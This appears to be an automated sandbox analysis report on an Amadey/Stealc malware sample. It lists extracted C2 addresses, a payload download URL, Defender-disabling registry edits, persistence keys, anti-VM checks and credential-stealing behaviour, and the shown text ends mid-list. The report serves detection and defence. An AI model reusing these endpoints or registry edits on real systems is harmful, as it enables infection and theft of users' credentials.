Analysis
-
max time kernel
90s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
26/03/2025, 04:03
Static task
static1
Behavioral task
behavioral1
Sample
5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe
Resource
win10v2004-20250314-en
General
-
Target
5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe
-
Size
1.8MB
-
MD5
7af72d60902f6d9bd4ddb565cd4b0946
-
SHA1
9a81b3d5d58e5f5ad4719dcf4ff3f5c59aebbebc
-
SHA256
5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5
-
SHA512
d4429d47082bb917e84a031cf71fb62fdbf4c7b77febde69fee4188b21da2d97b00d3f02d25f08226124b84a7df030a6d00ffd1fc43df66a1554582f5b462c50
-
SSDEEP
49152:Sw+XuSlBp9q3mmc5+d8hJC6gPJ/ReTbdVM:pAuSl39q3mmc5+d8nNgFReTZV
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/6256-36276-0x0000000000BF0000-0x0000000001044000-memory.dmp healer behavioral2/memory/6256-36275-0x0000000000BF0000-0x0000000001044000-memory.dmp healer behavioral2/memory/6256-37052-0x0000000000BF0000-0x0000000001044000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 8b610ed21e.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 8b610ed21e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8b610ed21e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8b610ed21e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8b610ed21e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8b610ed21e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8b610ed21e.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8b610ed21e.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 8b610ed21e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 8b610ed21e.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d5e3ea69b4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08422377eb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 327e56b382.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8b610ed21e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 30f17d9520.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 74 1100 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3508 powershell.exe 6032 powershell.exe 1100 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 12 IoCs
flow pid Process 74 1100 powershell.exe 28 724 rapes.exe 30 724 rapes.exe 41 724 rapes.exe 121 724 rapes.exe 34 2896 svchost.exe 45 724 rapes.exe 130 724 rapes.exe 130 724 rapes.exe 130 724 rapes.exe 130 724 rapes.exe 130 724 rapes.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\klupd_9c4d2b28a_arkmon.sys 6c9171d9.exe File created C:\Windows\System32\Drivers\klupd_9c4d2b28a_klbg.sys 6c9171d9.exe File created C:\Windows\System32\Drivers\9c4d2b28.sys 6c9171d9.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 4176 icacls.exe 4676 takeown.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9c4d2b28a_klbg\ImagePath = "System32\\Drivers\\klupd_9c4d2b28a_klbg.sys" 6c9171d9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9c4d2b28a_klark\ImagePath = "System32\\Drivers\\klupd_9c4d2b28a_klark.sys" 6c9171d9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9c4d2b28a_mark\ImagePath = "System32\\Drivers\\klupd_9c4d2b28a_mark.sys" 6c9171d9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9c4d2b28a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_9c4d2b28a_arkmon.sys" 6c9171d9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Ig3TmOD_412\ImagePath = "\\??\\C:\\Windows\\Temp\\Ig3TmOD_412.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9c4d2b28\ImagePath = "System32\\Drivers\\9c4d2b28.sys" 6c9171d9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9c4d2b28a_arkmon\ImagePath = "System32\\Drivers\\klupd_9c4d2b28a_arkmon.sys" 6c9171d9.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 7672 msedge.exe 3512 msedge.exe 8252 msedge.exe 11500 chrome.exe 12356 chrome.exe 12684 chrome.exe 952 msedge.exe 8268 msedge.exe 12364 chrome.exe 12764 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 327e56b382.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d5e3ea69b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8b610ed21e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 30f17d9520.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08422377eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 327e56b382.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d5e3ea69b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8b610ed21e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 30f17d9520.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08422377eb.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 2912 w32tm.exe -
Executes dropped EXE 25 IoCs
pid Process 724 rapes.exe 4244 apple.exe 4172 11.exe 5076 11.exe 1620 f73ae_003.exe 3912 f2839c3fc6.exe 412 tzutil.exe 2912 w32tm.exe 1932 7IIl2eE.exe 7036 TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE 11164 30f17d9520.exe 5576 rapes.exe 5128 svchost015.exe 8888 08422377eb.exe 7404 Passwords.com 4460 c8b4d5e382.exe 3132 svchost015.exe 6696 3682b59.exe 6088 39d1db7685.exe 12580 6c9171d9.exe 9304 327e56b382.exe 10980 d5e3ea69b4.exe 12572 b969c99e16.exe 6256 8b610ed21e.exe 7120 f73ae_003.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 327e56b382.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 8b610ed21e.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 30f17d9520.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine 08422377eb.exe Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine d5e3ea69b4.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9c4d2b28.sys 6c9171d9.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9c4d2b28.sys\ = "Driver" 6c9171d9.exe -
Loads dropped DLL 26 IoCs
pid Process 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe 12580 6c9171d9.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4676 takeown.exe 4176 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 8b610ed21e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8b610ed21e.exe -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f2839c3fc6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10337530101\\f2839c3fc6.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dabe1ae6-b5de-45cb-9a42-b17594b268a4 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{5d93a112-ec26-4d35-a4a9-74fb6d7c12d0}\\dabe1ae6-b5de-45cb-9a42-b17594b268a4.cmd\"" 6c9171d9.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\327e56b382.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10337950101\\327e56b382.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d5e3ea69b4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10337960101\\d5e3ea69b4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b969c99e16.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10337970101\\b969c99e16.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8b610ed21e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10337980101\\8b610ed21e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 6c9171d9.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 6c9171d9.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000500000001ea8e-107.dat autoit_exe behavioral2/files/0x000900000001eeaf-36203.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 8904 tasklist.exe 8468 tasklist.exe 13232 tasklist.exe 6728 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1988 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe 724 rapes.exe 7036 TempCHJ72QNR6L8OIM6YC0DKSN1SHZ3MLTY8.EXE 11164 30f17d9520.exe 5576 rapes.exe 8888 08422377eb.exe 9304 327e56b382.exe 10980 d5e3ea69b4.exe 6256 8b610ed21e.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 11164 set thread context of 5128 11164 30f17d9520.exe 195 PID 4460 set thread context of 3964 4460 c8b4d5e382.exe 211 PID 8888 set thread context of 3132 8888 08422377eb.exe 212 PID 6088 set thread context of 5692 6088 39d1db7685.exe 218 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 3682b59.exe File opened (read-only) \??\VBoxMiniRdrDN 6c9171d9.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2068 sc.exe 4220 sc.exe 3048 sc.exe 1852 sc.exe 4476 sc.exe 4020 sc.exe 1932 sc.exe 3264 sc.exe 4316 sc.exe 2140 sc.exe 4128 sc.exe 4204 sc.exe 3508 sc.exe 4920 sc.exe 548 sc.exe 404 sc.exe 776 sc.exe 5020 sc.exe 2832 sc.exe 1032 sc.exe 4004 sc.exe 4276 sc.exe 2372 sc.exe 1200 sc.exe 4828 sc.exe 1784 sc.exe 3828 sc.exe 704 sc.exe 2452 sc.exe 1828 sc.exe 112 sc.exe 4048 sc.exe 2588 sc.exe 1780 sc.exe 4880 sc.exe 2640 sc.exe 4664 sc.exe 4228 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh 6c9171d9.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh 6c9171d9.exe -
System Location Discovery: System Language Discovery 1 TTPs 45 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08422377eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d5e3ea69b4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language b969c99e16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b969c99e16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2839c3fc6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage b969c99e16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5e597a1b3b27fc614676bc331e7134bda14805ad4458d8649195aab33a102ae5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 30f17d9520.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 